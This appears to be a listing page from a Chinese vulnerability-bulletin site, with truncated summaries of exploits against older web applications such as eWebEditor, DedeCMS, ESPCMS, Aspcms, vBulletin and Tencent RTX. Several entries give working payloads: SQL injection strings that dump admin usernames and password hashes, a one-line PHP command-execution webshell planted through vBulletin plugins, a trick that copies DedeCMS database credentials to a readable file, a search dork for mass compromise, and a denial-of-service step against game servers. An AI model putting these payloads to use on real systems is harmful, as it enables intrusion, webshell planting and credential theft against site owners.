>- 赞助广告
- 推荐信息
- 热门信息
- 赞助广告商
[漏洞播报] ewebeditor高版本>=5.5鸡肋0day及修复内容简介:利用方法: 先访问这个地址 Editor/asp/upload.asp?action=savetype=imagestyle=popupcusdir=a.asp 访问这个地址可以建立个A.ASP的文件夹 再用这个html代码上传。 form action=http://www.xxx.com/Editor/asp/upload.asp?action=savetype=imagestyle=popupcu...
[漏洞播报] 多多返利淘宝客程序Duoduo v7.3注入漏洞内容简介:披露状态: 2012-01-29: 积极联系厂商并且等待厂商认领中,细节不对外公开 2012-01-29: 厂商已经主动忽略漏洞,细节向公众公开 简要描述: http://demo.duoduo123.com/huangou.php?id=-1%20union%20select%201,2,3,group_concat%28table_name%29,5,6,7,8%2...
[漏洞播报] DEDECMS V5.7漏洞 - 游客无限刷顶踩数值内容简介:简要描述:只测试了DEDECMS V5.7系统,之前的版本估计也一样。 在官方地址进行的简单测试,应该算是一个小BUG,利用这个可以无限的刷某篇文章的顶/踩 数值。 详细说明:虽然前端页面做了 游客 只能提交一次的限制,但是直接以URL访问则没有限制,只要按着F5不放...
[漏洞播报] 传奇私服程序Bug漏洞利用内容简介:攻击传奇私服只要没关3000端口的!你在CMD下用:telnetIP3000可以查出在线人数!在IE中执行: http://IP:3000一直击回车键,直到显示无法打开网页,就攻击成功了!这个私服就不能再登陆进人了 ..不能登陆了解决这个要用2k的IP安全策略来封闭的端口...
[漏洞播报] shop363网店程序真正通杀漏洞0day利用内容简介:这个程序安全不是很好,不过其中的一个replace()函数写的很好,不过没有找到是怎么写的,将注射中的空格、select、%20、+号、还有/**/等过滤为空。在搜索出存在漏洞语句很麻烦 ,我也不写了,直接来个釜底抽薪的方法,直接拿密码账号很快的。 关键字:技术...
[漏洞播报] 星网互动上传漏洞分析内容简介:Author:狗一样的男人 upfile_flash.asp ######################################################################################################## % set upload=new upload_file if upload.form(act)=uploadfile then filepath=trim(upload.form(filepa...
[漏洞播报] ESPCMS通杀0day(可以批量拿webshell入侵网站)内容简介:百度关键字:inurl:index.php?ac=articleat=readdid= =========================================================================================================== 默认后台:adminsoft/index.php OR admin ============================================...
[漏洞播报] 腾讯RTX上传任意文件及修复内容简介:安装RTX后打开IP:8012网址 腾讯RTX存在UserPhoto/photoUpload.php任意文件上传漏洞 详细说明: 简单的一个post表单即可上传 $user_account = $_POST[user_account]; $file_name = $_POST[file_name]; $file_data = $_POST[file_data]; 无任何过滤 漏洞证明:...
[漏洞播报] 一条龙奇迹私服WEB系统2处漏洞内容简介:后门,你懂得 一条龙开服专用WEB系统。 就是那些给几千元就送个配置好的服务器给你立刻当GM的东西,骗了不少无知少年。 加密的,很难找到了解密文件。 看代码。 LgKj.LocalDevilRank.asp: 开头省了没用的 Sc=request.Form(ServerCode) Job=request.Form(Job...
[漏洞播报] Aspcms 1.5 COOKIES注入0day及修复内容简介:Aspcms 1.5 COOKIES注入0day,注册一个帐号。然后登陆后修改COOKIES的USERID值 在后面加上注入语句: UNION SELECT 1,2,3,4,5,6,username,adminpassword,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Aspcms_admins 然后编辑帐号就能看到管理员的帐号和MD5...
[漏洞播报] DEDECMS全局变量覆盖漏洞科普(dedecms最新0day)内容简介:DEDECMS全局变量覆盖漏洞最早是狼族安全小组09年公布的,官方硬撑到现在没修补漏洞,到现在基本上覆盖了DEDECMS全部的版本。个人猜想是不是官方故意留下的后门。下面稍微科普下这个漏洞,大牛们可以完全无视: 一. 了解PHP超级全局变量 下面是PHP的超级全局...
[漏洞播报] vBulletin论坛后台拿shell及修复内容简介:在后台,进插件管理.添加插件. Ajax_complete 填入代码: if(isset($_GET[cmd])){echo h1cmd/h1pre; system($_GET[cmd]);exit;} 激活mod 访问: www.520 jsj.com /forumlocation/ajax.php?cmd=command 比如:www. /forumlocation/ajax.php?cmd=ls,就执行了ls...
[漏洞播报] GoCDKEY游戏推广系统上传漏洞内容简介:因需要下了源码看了下 出现在\inc\img_save.asp 文件 set fs=server.CreateObject(scripting.filesystemobject) set upload=new upload_5xSoft 建立上传对象 --------将日期转化成文件名-------- formPath=/uploadfile/ formpath2=upload.form(type) //* BUG...
[漏洞播报] tipask问答系统1.4上传漏洞内容简介:user.php (用户操作) function oneditimg() { //修改头像 if (isset($_FILES[Filedata])) { $upload_tmp_path = data/tmp/; $fileName = bigavatar . $this-user[uid] . . . substr($_FILES[Filedata][name], -3); move_uploaded_file($_FILES[Filedata][t...
[漏洞播报] dede 0day 利用小技巧内容简介:By:zafe 遇到可写不可执行的,可执行不可写的站的也许用的上 {dede:php}copy(../data/common.inc.php,../data/cache/test.txt);{/dede:php} 然后去xxx.com/data/cache/test.txt看数据库信息,如果是root那就happy吧 如果是普通用户,首先看下有哪些数据库:...